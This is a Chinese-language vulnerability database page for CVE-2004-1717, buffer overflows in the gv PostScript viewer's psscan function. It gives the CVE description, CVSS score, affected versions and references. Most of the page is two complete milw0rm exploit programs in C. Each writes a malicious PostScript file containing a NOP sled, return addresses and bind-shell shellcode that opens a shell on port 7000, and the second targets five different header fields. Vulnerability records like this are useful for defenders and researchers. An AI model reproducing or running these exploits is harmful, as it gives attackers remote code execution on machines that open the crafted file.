CVE-2004-1717
CVSS7.5
发布时间 :2004-08-16 00:00:00
修订时间 :2016-10-17 22:59:45
NMCOE    

[原文]Multiple buffer overflows in the psscan function in ps.c for gv (ghostview) allow remote attackers to execute arbitrary code via a Postscript file with a long (1) BoundingBox, (2) comment, (3) Orientation, (4) PageOrder, or (5) Pages value.


[CNNVD]GV Postscript 和PDF Viewer多个远程缓冲区溢出漏洞(CNNVD-200408-132)

        gv (ghostview)文件ps.c中的psscan函数存在多个缓冲区溢出漏洞。远程攻击者可以通过各种超长的Postscript文件执行任意代码,这些文件包含(1) BoundingBox, (2) comment, (3) Orientation, (4) PageOrder,或(5) Pages value。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:gv:gv:2.7b4
cpe:/a:gv:gv:3.5.3
cpe:/a:gv:gv:2.7b3
cpe:/a:gv:gv:3.1.6
cpe:/a:gv:gv:3.4.3
cpe:/a:gv:gv:3.5.2
cpe:/a:gv:gv:3.2.4
cpe:/a:gv:gv:3.4.2
cpe:/a:gv:gv:2.7b5
cpe:/a:gv:gv:3.1.4
cpe:/a:gv:gv:3.0.0
cpe:/a:gv:gv:3.4.12
cpe:/a:gv:gv:3.0.4
cpe:/a:gv:gv:2.7b2
cpe:/a:gv:gv:2.7b1
cpe:/a:gv:gv:2.7.6
cpe:/a:gv:gv:2.9.4
cpe:/a:gv:gv:3.5.8

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1717
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1717
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-132
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109267677114331&w=2
(UNKNOWN)  BUGTRAQ  20040816 gv buffer overflows: here, there, and everywhere
http://www.securityfocus.com/bid/10944
(VENDOR_ADVISORY)  BID  10944
http://xforce.iss.net/xforce/xfdb/17019
(VENDOR_ADVISORY)  XF  gv-psscan-header-bo(17019)

- 漏洞信息

GV Postscript 和PDF Viewer多个远程缓冲区溢出漏洞
高危 缓冲区溢出
2004-08-16 00:00:00 2005-10-20 00:00:00
远程  
        gv (ghostview)文件ps.c中的psscan函数存在多个缓冲区溢出漏洞。远程攻击者可以通过各种超长的Postscript文件执行任意代码,这些文件包含(1) BoundingBox, (2) comment, (3) Orientation, (4) PageOrder,或(5) Pages value。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (390)

GV PostScript Viewer Remote Buffer overflow Exploit (EDBID:390)
linux remote
2004-08-13 Verified
0 infamous41md
N/A [点击下载]
/*
 * gv postscript viewer exploit , infamous42md AT hotpop DOT com
 *
 * run of the mill bof.  spawns a remote shell on port 7000.  woopty doo. if
 * someone has been able to exploit the heap overflow in cfengine, please email
 * me and teach me something. after days of pain i've concluded it's not 
 * possible b/c you can't manipulate the heap enough to get anything good in 
 * front of you.  please prove me wrong so i can learn.
 *
 * shouts to mitakeet
 *
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  [n00b localho outernet] gcc -Wall -o gvown gvown.c
 *  [n00b localho outernet] ./gvown 0xbffff350
 *  [n00b localho outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps 
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN   
  
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- "
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"


/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
    

int main(int argc, char **argv)
{
    int len, x, fd;
    char    buf[BS];
    u_long  retaddr;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);

    /* create 3vil buf */
    memset(buf, NOP, BS);
    strcpy(buf, PS_COMMENT);
    len = strlen(buf);
    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 1;   /* + NULL */

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");
    
    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);
    
    return 0;
}

// milw0rm.com [2004-08-13]
		

- 漏洞信息 (400)

GV PostScript Viewer Remote Buffer overflow Exploit (2) (EDBID:400)
linux remote
2004-08-18 Verified
0 infamous41md
N/A [点击下载]
* there are at least 4 other stack buffer overflows, and 2 heap overflows.
 * the first exploit i wrote exploited the one in the GLSA, and this one exploits 
 * that hole and four other ones as well. all of these are in the psscan() function
 * located in the ps.c file: 'grep -nP 'sscanf\(.*?%%.*?%s' ps.c'
 * 
 * gv postscript viewer exploit part deux, infamous42md AT hotpop DOT com
 *
 * ok kiddies you've got choices here!  we can overflow the text buffer at 5
 * different places, we can also overflow the heap at 2 places, and ooh i
 * bet if you look around there are tons of other places as well!
 *
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- ASDF"
#define BOUND_BOX "%%BoundingBox:"
#define ORIENTATION "%%Orientation:"
#define PAGE_ORDER "%%PageOrder:"
#define PAGES "%%Pages:"
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"

/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x3b\x2c\x30\xcd\x80";

    

int main(int argc, char **argv)
{
    int len, x, fd;
    char    buf[BS];
    u_char  methodman = 0x0;
    u_long  retaddr;

    if(argc < 3){
        fprintf(stderr, "Usage: %s < retaddr > < ownage method c b o p r>\n",
argv[0]);        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);
    methodman = argv[2][0];

    /* create 3vil buf */
    memset(buf, NOP, BS);
    if(methodman == 'b')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, BOUND_BOX);
    else if(methodman == 'c')
        len = snprintf(buf, BS-1, "%s", PS_COMMENT);
    else if(methodman == 'o')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, ORIENTATION);
    else if(methodman == 'p')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, PAGES);
    else if(methodman == 'r')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, PAGE_ORDER);
    else{
        printf(
        "Cmon man pick a funkin method!!\n"
        "oh i see, 5 is not enough to choose from??\n"
        "don't worry, there are more, just read the source to find them\n"
        "ok fine, you don't want to overflow the stack, understandable.\n"
        "there are also some heap overflows you picky bastard\n"
        "grep -n sscanf\n");
        return EXIT_FAILURE;
    }

    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 2; 

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT, 0666)) < 0)
        die("open");
    
    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);
    
    return 0;
}

// milw0rm.com [2004-08-18]
		

- 漏洞信息

15970
gv psscan Function Postscript File Multiple Header Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-08-16 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站